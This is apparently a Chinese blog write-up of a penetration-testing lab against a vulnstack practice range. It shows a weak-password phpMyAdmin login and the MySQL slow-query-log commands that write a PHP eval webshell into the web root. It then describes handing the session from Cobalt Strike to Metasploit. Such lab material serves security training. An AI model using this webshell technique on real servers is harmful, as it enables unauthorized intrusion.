内网渗透之小试牛刀

本文详细介绍了内网渗透的过程,包括思路、获取权限、准备工作、内网搜集、横向渗透和拿下域控等步骤。通过判断系统、收集端口和目录信息,发现了PHPMyAdmin的弱口令,利用慢查询日志获取shell。接着使用CS与MSF配合进行提权,并进行内网信息收集,最终通过多种方法如令牌假冒、PTH攻击等成功拿下域控。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

内网渗透之小试牛刀


  • 离你最近的地方,路途最远。

思路:

获取服务器权限->进入内网->判断是否在域中->信息收集(定位域控、域主机、域用户账号密码等)->横向移动(漏洞利用)->拿下域控。

获取权限:

靶场为http://vulnstack.qiyuanxuetang.net/vuln
直接开搞,首先判断yxcms,然后根据版本尝试一些漏洞无果,进而收集端口以及目录,发现phpmyadmin,弱口令进入
在这里插入图片描述通过慢查询日志getshell

show variables like '%slow%'; 
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/phpstudy/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);

在这里插入图片描述 即可获取shell:
在这里插入图片描述

准备工作:

由于菜刀不好用,直接反弹cs,
在这里插入图片描述然后将cs传给msf,首先msf利用exploit/multi/handler监听,然后cs中把msf监听地址以及端口添加到listen并使用forgein进行监听,然后cs中spawn即可。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值